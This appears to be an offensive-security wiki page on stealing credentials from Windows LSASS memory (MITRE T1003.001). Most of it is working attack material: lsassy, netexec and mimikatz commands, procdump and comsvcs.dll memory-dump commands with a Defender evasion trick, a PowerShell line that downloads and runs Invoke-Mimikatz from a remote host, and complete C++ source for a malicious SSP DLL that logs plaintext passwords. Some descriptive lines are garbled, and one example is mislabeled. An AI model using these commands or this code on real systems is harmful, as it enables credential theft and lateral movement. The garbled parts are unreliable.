LSASS secrets

MITRE ATT&CK™ Sub-technique T1003.001

Theory

The Local Security Authority Subsystem Service (LSASS) is a Windows service responsible for enforcing the security policy on the system. LSASS hosts security-related services such as :

AuthN SSPI: An API, allowing applications to use network security protocols
SAM: Interface for the .
Vault: Allowing to manage credentials in the .
Audit: Enforced audit policy to generate audit records in the security event log.
Key Isolation: Provides key process isolation to private keys and associated cryptographic operations
EFS: Allow to perform some cryptographic operations for File encryption
DPAPI: Interface for the CryptAPI library, allowing to protect data.

LSASS services are reachable trough RPC

Practice

Dumping LSASS Memory

LSASS operations lead to the storage of credential material in its process memory. With administrative rights only, this material can be harvested (either locally or remotely).

# With pass-the-hash (NTLM)
lsassy -u $USER -H $NThash $TARGETS

# With plaintext credentials
lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS

# With pass-the-ticket (Kerberos)
lsassy -k $TARGETS

# NetExec Module examples
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
netexec smb $TARGETS -k -M lsassy
netexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd

# (Locally) extract credentials from LSASS process memory
sekurlsa::logonpasswords

# (Remotely) analyze a memory dump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

For Windows 2000, a special version of mimikatz called mimilove can be used.

pypykatz lsa minidump lsass.dmp

procdump --accepteula -ma lsass lsass.dmp

Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) "bypasses" that.

# Find lsass's pid
tasklist /fi "imagename eq lsass.exe"

# Dump lsass's process memory
procdump -accepteula -ma $lsass_pid lsass.dmp

The native comsvcs.dll DLL found in C:\Windows\system32 can be used with rundll32 to dump LSASS's process memory.

# Find lsass's pid
tasklist /fi "imagename eq lsass.exe"

# Dump lsass's process memory
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.dmp full

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

Security Support Provider DLLs

Mimikatz support in memory SSP DLL injection to the LSASS process.

mimikatz# privilege::debug
mimikatz# misc::memssp

sspcustom.cpp

#include "stdafx.h"
#define WIN32_NO_STATUS
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <NTSecAPI.h>
#include <ntsecpkg.h>
#include <iostream>
#pragma comment(lib, "Secur32.lib")

NTSTATUS NTAPI SpInitialize(ULONG_PTR PackageId, PSECPKG_PARAMETERS Parameters, PLSA_SECPKG_FUNCTION_TABLE FunctionTable) { return 0; }
NTSTATUS NTAPI SpShutDown(void) { return 0; }

NTSTATUS NTAPI SpGetInfo(PSecPkgInfoW PackageInfo)
{
	PackageInfo->Name = (SEC_WCHAR *)L"SSPCustom";
	PackageInfo->Comment = (SEC_WCHAR *)L"SSPCustom <o>";
	PackageInfo->fCapabilities = SECPKG_FLAG_ACCEPT_WIN32_NAME | SECPKG_FLAG_CONNECTION;
	PackageInfo->wRPCID = SECPKG_ID_NONE;
	PackageInfo->cbMaxToken = 0;
	PackageInfo->wVersion = 1;
	return 0;
}

NTSTATUS NTAPI SpAcceptCredentials(SECURITY_LOGON_TYPE LogonType, PUNICODE_STRING AccountName, PSECPKG_PRIMARY_CRED PrimaryCredentials, PSECPKG_SUPPLEMENTAL_CRED SupplementalCredentials)
{
	HANDLE outFile = CreateFile(L"c:\\temp\\lsa-pwned.txt", FILE_GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	DWORD bytesWritten = 0;
	
	std::wstring log = L"";
	std::wstring account = AccountName->Buffer;
	std::wstring domain = PrimaryCredentials->DomainName.Buffer;
	std::wstring password = PrimaryCredentials->Password.Buffer;

	log.append(account).append(L"@").append(domain).append(L":").append(password).append(L"\n");
	WriteFile(outFile, log.c_str(), log.length() * 2, &bytesWritten, NULL);
	CloseHandle(outFile);
	return 0;
}

SECPKG_FUNCTION_TABLE SecurityPackageFunctionTable[] = 
{
	{
		NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,	SpInitialize, SpShutDown, SpGetInfo, SpAcceptCredentials, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL 
	}
};

// SpLsaModeInitialize is called by LSA for each registered Security Package
extern "C" __declspec(dllexport) NTSTATUS NTAPI SpLsaModeInitialize(ULONG LsaVersion, PULONG PackageVersion, PSECPKG_FUNCTION_TABLE *ppTables, PULONG pcTables)
{
	*PackageVersion = SECPKG_INTERFACE_VERSION;
	*ppTables = SecurityPackageFunctionTable;
	*pcTables = 1;
	return 0;
}

Alternatively, we may modify LSA Registry keys to add new SSPs which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called :

References

Last updated 1 year ago

Was this helpful?